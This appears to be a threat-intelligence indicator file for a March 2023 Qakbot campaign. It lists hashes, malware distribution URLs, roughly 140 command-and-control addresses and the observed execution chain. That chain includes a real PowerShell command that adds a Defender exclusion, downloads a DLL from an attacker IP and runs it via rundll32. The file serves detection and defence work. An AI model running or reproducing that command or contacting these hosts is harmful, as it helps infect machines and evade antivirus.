-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathQakbot_BB18_10.03.2023.txt
162 lines (148 loc) · 3.97 KB
/
Qakbot_BB18_10.03.2023.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
10.03.2023 | Qakbot | BB18 | Campaign 1678346017 | 404.226
*************************************************
.html List.html
.js 9e1c6fc98aeadf1af70f6edfd9b2584968f9340b4c86322e307131ed7de9a6db
.dll 4d1832d49f6695d8559fdcab96338ec1d4f2804f8f89a7f9dce40d5de1ee4aed
*************************************************
Exec
wscript.exe out.js
powershell.exe" -encodedcommand $hallucinator = Get-ItemProperty -Path HKCU:\\SOFTWARE\\WordspinnerNonsuches | %{$_.pabalumPhenazin}; $hallucinator = "AcousticallySuperalbuminosis" + $hallucinator; [Reflection.Assembly]::Load([Convert]::fromBase64String($hallucinator)); [classicyc1]::Execute("powershell -executionpolicy bypass -windowstyle hidden ""`$currentDrive = `(get-location`).Drive.Name + ':\'; Add-MpPreference -ExclusionPath `$currentDrive;Start-Sleep -Seconds 3;reg delete HKEY_CURRENT_USER\SOFTWARE\autoharpMaskette /v pabalumPhenazin /f""");Start-Sleep -Seconds 3;Invoke-WebRequest http://85.239.54.233/DmVW/1 -O $env:TEMP\hyperarchepiscopal.dll;start rundll32 $env:TEMP\\hyperarchepiscopal.dll,XL55;
rundll32.exe C:\Users\Admin\AppData\Local\Temp\\hyperarchepiscopal.dll XL55
*************************************************
distro urls
http://149.255.35.153/URME.php
http://149.255.35.189/LLIE.php
http://194.213.18.132/AIEO.php
http://194.37.97.154/EBU.php
http://37.72.174.5/OOED.php
http://45.66.249.196/UDT.php
http://85.239.54.220/UU.php
http://85.239.54.233/DmVW/1
http://85.239.53.76/31x/1
http://194.213.18.84/HYK8sNh/1
http://85.239.53.88/DJkEN/1
https://parallax-systems.com/7mBam/05
https://lamh.online/2FlJ/030
https://rk.eng.br/1zVX3d/05
https://ledapharma.com/2gjLX04/3
https://icradost.org/aSZW/09
*************************************************
c2's
114.143.176.235:443
92.154.17.149:2222
2.14.45.117:2222
84.108.200.161:443
109.11.175.42:2222
88.126.94.4:50000
87.202.101.164:50000
50.68.204.71:995
49.245.82.178:2222
12.172.173.82:32101
190.11.198.76:443
79.67.165.149:995
115.87.227.49:443
84.215.202.22:443
118.250.110.98:995
66.131.25.6:443
80.1.152.201:443
198.2.51.242:993
151.48.158.236:443
50.68.204.71:993
85.61.165.153:2222
84.35.26.14:995
197.92.136.122:443
174.4.89.3:443
187.199.103.21:32103
98.37.25.99:443
184.153.132.82:443
85.59.61.52:2222
103.231.216.238:443
162.248.14.107:443
50.68.186.195:443
2.82.8.80:443
74.92.243.113:50000
80.47.61.240:2222
108.190.203.42:995
24.69.84.237:443
184.176.110.61:61202
12.172.173.82:990
12.172.173.82:465
172.90.139.138:2222
72.80.7.6:50003
50.68.204.71:443
202.186.177.88:443
183.87.163.165:443
12.172.173.82:21
24.239.69.244:443
47.21.51.138:995
174.104.184.149:443
93.147.134.85:443
136.175.69.147:443
12.172.173.82:995
73.165.119.20:443
69.133.162.35:443
12.172.173.82:20
154.246.62.48:993
92.159.173.52:2222
74.66.134.24:443
12.172.173.82:2087
190.75.151.215:2222
94.63.65.146:443
108.44.207.232:443
174.58.146.57:443
116.75.63.136:443
180.151.104.240:443
103.123.223.121:443
103.252.7.231:443
12.172.173.82:22
212.70.107.156:2222
103.111.70.115:995
49.175.72.156:443
72.203.216.98:2222
173.18.126.3:443
86.250.10.160:2222
142.161.27.232:2222
103.42.86.110:995
75.143.236.149:443
91.169.12.198:32100
64.237.221.254:443
103.71.21.107:443
103.140.174.19:2222
172.248.42.122:443
69.164.228.175:443
59.28.84.65:443
184.176.35.223:2222
202.187.95.12:995
201.244.108.183:995
103.111.70.115:443
2.50.50.227:443
27.0.48.233:443
103.141.50.102:995
86.225.214.138:2222
12.172.173.82:50001
75.156.125.215:995
116.72.250.18:443
202.142.98.62:443
47.21.51.138:443
64.229.202.224:995
202.142.98.62:995
125.99.69.178:443
217.165.230.100:2222
82.212.111.148:443
98.145.23.67:443
47.203.229.168:443
77.86.98.236:443
50.67.17.92:443
176.142.207.63:443
73.36.196.11:443
35.143.97.145:995
90.104.22.28:2222
73.22.121.210:443
82.127.204.82:2222
45.50.233.214:443
47.34.30.133:443
24.117.237.157:443
76.170.252.153:995
81.229.117.95:2222
98.163.227.79:443
86.10.146.216:443